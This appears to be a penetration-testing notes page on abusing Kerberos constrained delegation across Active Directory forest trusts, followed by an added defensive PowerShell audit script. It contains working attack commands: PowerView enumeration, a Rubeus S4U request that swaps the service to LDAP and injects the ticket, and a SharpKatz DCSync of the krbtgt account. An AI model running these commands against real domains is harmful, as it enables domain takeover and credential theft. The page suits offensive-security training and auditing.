# constrained-delegation

Classic constrained delegation does not work across forest trusts. However, it can still be abused once we have a foothold on the other side of the forest trust.

## PowerShell

### PowerView

```
Get-DomainUser -TrustedToAuth -Domain <target>
Get-DomainComputer -TrustedToAuth -Domain <target>
```

### ADModule

```
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo -Server <target>
```

## Binaries

> [!INFO] Remember to follow the Binaries methodology

### Rubeus

**We can request an alternate ticket using Rubeus**

```
C:\AD\Tools\Rubeus.exe hash /password:Qwerty@2019 /user:storagesvc /domain:eu.local
```

**Get creds for compromised user and request ldap altservice**

Note that AES256 may not work across forests; it depends on whether or not AES encryption is supported.

```
C:\AD\Tools\Rubeus.exe s4u /user:<owned_user> /rc4:<ntlm_owned_user> /impersonateuser:Administrator /domain:eu.local /msdsspn:cifs/some_machine.other_forest.local /altservice:ldap /domain:other_forest.local /dc:some-dc.other_forest.local /ptt
```

**DCSync**

```
./SharpKatz.exe --Command dcsync --user other_forest\krbtgt --Domain other_forest.local --DomainController some-dc.other_forest.local
```
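
**Auditing delegation targets (added example)**

The `/altservice` step above swaps `cifs` for `ldap`, so the host part of a delegated SPN matters more than its service class. The audit below is an added example, not from the original page: it lists every `msDS-AllowedToDelegateTo` entry and flags those whose host is a domain controller. It assumes the ActiveDirectory module is available and uses `other_forest.local` as a placeholder for the domain being audited.

```powershell
# Added example: flag constrained-delegation SPNs that point at domain controllers.
Import-Module ActiveDirectory

$Server = 'other_forest.local'   # assumption: placeholder for the audited domain

# FQDN and short name of every DC in the audited domain, lower-cased.
$dcHosts = Get-ADDomainController -Filter * -Server $Server |
    ForEach-Object { $_.HostName.ToLower(); $_.Name.ToLower() }

# userAccountControl bit TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition).
$TrustedToAuth = 0x1000000

Get-ADObject -LDAPFilter '(msDS-AllowedToDelegateTo=*)' `
    -Properties 'msDS-AllowedToDelegateTo', 'userAccountControl' -Server $Server |
ForEach-Object {
    $account = $_
    foreach ($spn in $account.'msDS-AllowedToDelegateTo') {
        # SPN layout: class/host[:port][/servicename]
        $parts = $spn -split '/', 3
        if ($parts.Count -lt 2) { continue }
        $targetHost = ($parts[1] -split ':')[0].ToLower()

        [pscustomobject]@{
            Account            = $account.DistinguishedName
            DelegatedSpn       = $spn
            ProtocolTransition = [bool]($account.userAccountControl -band $TrustedToAuth)
            # A DC as target host means any service class on it, ldap included,
            # is within reach of whoever controls this account.
            TargetIsDC         = $dcHosts -contains $targetHost
        }
    }
} | Sort-Object -Property TargetIsDC, ProtocolTransition -Descending |
    Format-Table -AutoSize
```

Rows with `TargetIsDC` set are the ones to remove or re-scope first, and rows with `ProtocolTransition` set need no prior user authentication to the delegating account.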
